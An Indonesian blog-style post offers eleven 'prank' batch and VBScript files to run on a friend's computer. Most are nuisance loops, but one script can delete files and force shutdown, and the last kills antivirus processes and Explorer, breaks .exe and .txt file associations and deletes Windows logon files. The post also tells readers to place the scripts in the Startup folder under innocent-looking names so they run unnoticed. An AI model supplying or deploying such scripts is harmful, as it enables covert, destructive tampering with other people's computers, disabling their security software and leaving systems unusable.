Saya punya script jahil nih yg mau saya share dengan sobat . Intinya ini hanya untuk mengerjai komputer teman,pasti dia kesal banget dan bisa aja menjadi marah monitornya di banting… hehehe.

Script ini sobat buat melalui Notepad dan harus sobat simpan dengan menggunakan ekstensi yang saya sebutkan.

Oke deh segera cek script jahil ini.

script ini bisa kta pakai, untuk menjahili komputer anak orang !!
bahan-bahan yg harus sobat siapkan adalah :

  1. Notepad
  2. kopi
  3. pasta
  4. alias kopas
  5. Bersiap2 menerima dosa… agagagagagag (kidding)

setelah smuanya siap,, kupas (mksdx copas) script di bawah ke dalam notepad !!

1. MESSAGES YG MUNCUL TERUS MENERUS SECARA OTOMATIS

Code:

@ECHO off :Begin msg * muka lo jelek msg * ngaca dulu gih msg * hayo lo, cpu lu gw acak2 msg * ud install ulang aja msg * biar masalah nya kelar GOTO BEGIN

==> save nama script diatas dg ekstensi *.bat

2. BIKIN SHUTDOWN + MESSAGES

Code:

@echo off msg * apaan sih lo shutdown -s -c "Error! muka mu standar abis"

==> save nama script diatas dg ekstensi *.bat

3. MAININ TOMBOL CAPS LOCK

Code:

Set wshShell =wscript.CreateObject ("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{CAPSLOCK}" loop

==> save nama script diatas dg ekstensi *.vbs

4. BUKA TUTUP CD/DVD SECARA OTOMATIS

Code:

Set oWMP = CreateObject ("WMPlayer.OCX.7") Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 5000 loop

==> save nama script diatas dg ekstensi *.vbs

5. BIKIN VB SCRIPT MUNCUL TERUS MENERUS SECARA OTOMATIS

Code:

Set wshShell = wscript.CreateObject ("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "~(enter)" loop

==> save nama script diatas dg ekstensi *.vbs

6. MENEKAN TOMBOL BACKSPACE TERUS MENERUS SECARA OTOMATIS

Code:

MsgBox "kembali ke menu sebelumnya" Set wshShell =wscript.CreateObject ("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{bs}" loop

==> save nama script diatas dg ekstensi *.vbs

7. OTOMATIS NGETIK “LU JELEK BANGET SIH” DI NOTEPAD ATAU M.WORD

Code:

Set wshShell = wscript.CreateObject ("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "lu jelek banget sih!!!" loop

==> save nama script diatas dg ekstensi *.vbs

8. MEMBUKA NOTEPAD TERUS MENERUS

Code:

@ECHO off :top START %SystemRoot% \system32\notepad.exe GOTO top

==> save nama script diatas dg ekstensi *.bat

9. OTOMATIS BUKA NOTEPAD LALU NGETIK “APA YG LO MAU”

Code:

WScript.Sleep 1800 WScript.Sleep 100 Set WshShell = WScript.CreateObject ("WScript.Shell") WshShell.Run "notepad" WScript.Sleep 10 WshShell.AppActivate "Notepad" WScript.Sleep 50 WshShell.SendKeys "ka" WScript.Sleep 50 WshShell.SendKeys "mu " WScript.Sleep 50 WshShell.SendKeys "je" WScript.Sleep 50 WshShell.SendKeys "le" WScript.Sleep 50 WshShell.SendKeys "k " WScript.Sleep 50 WshShell.SendKeys " se" WScript.Sleep 50 WshShell.SendKeys "ka" WScript.Sleep 50 WshShell.SendKeys "li" WScript.Sleep 50 WshShell.SendKeys " y" WScript.Sleep 50 WshShell.SendKeys "a" WScript.Sleep 50 WshShell.SendKeys " h" WScript.Sleep 50 WshShell.SendKeys "!" WScript.Sleep 50 WshShell.SendKeys "!! " 

==> save nama script diatas dg ekstensi *.vbs

10. BISA MEMILIH JAWABAN SEPERTI QUIZ LAH KIRA2

Code:

@echo off title quiz hari ini :)
:menu cls echo jika kamu kena virus apa yang kamu lakukan pause echo pilih yang mana: echo 1. matiin computer echo 2. format aja echo 3. bingung ahh set input=nothing set /p input=Choice: if %input%==1 shutdown -s -t 30 if %input%==2 del c:\xxx if %input%==3 @ECHO off msg * muka lo rusak msg * ngaca dulu gih msg * hayo lo,cpu lu gw acak2 msg * ud install ulang aja msg * biar masalah nya kelar @ECHO off :top START %SystemRoot% \system32\notepad.exe GOTO top

==> nah script diatas save jadi quiz.bat, lalu kasih ke anak orang… KYAKYAKYAKYA……..

11. YANG INI PALING BAHAYA, JANGAN DICOBA DI KOMPUTER SOBAT :D

Code:

@echo off set end=md “Hack installing” set fin=copy “Hack log.txt” “Installing” %end% %fin% net send * Hack is installing, press OK to begin set up. kill NAVAPSVC.exe /F /Q kill zonelabs.exe /F /Q kill explorer.exe /F /Q cls assoc .exe=txtfile assoc .txt=mp3file cls msg * It is you who is hacked …. msg * I warned you, and you kept going. Challenge me and this is what happens. DEL C:\WINDOWS \system32\logoff.exe / F /Q DEL C:\WINDOWS \system32\logon.exe / F /Q DEL C:\WINDOWS \system32\logon.scr / F /Q cls shutdown -s -t 5 -c “ thank you for waiting”

==> save script diatas dg ekstensi *.bat

Dari semua script diatas, cara menjalankannya adalah dengan mengklik 2x file yang kita buat dari notepad tadi. Kalau mau mengusili komputer teman dan bisa dijalankan secara otomatis, kopi file script yg udah sobat simpan ke folder startup di Menu Start. Setelah itu  saya sarankan selama seminggu gak nongol biar nggak di lempar sama monitor…. hehehe

Waktu menyimpan dengan ekstensi *.bat atau *.vbs ,Ganti * menjadi nama file, misal usil.bat atauancur.vbs

Sebaiknya buat nama file yang tidak mencurigakan si pengguna komputer…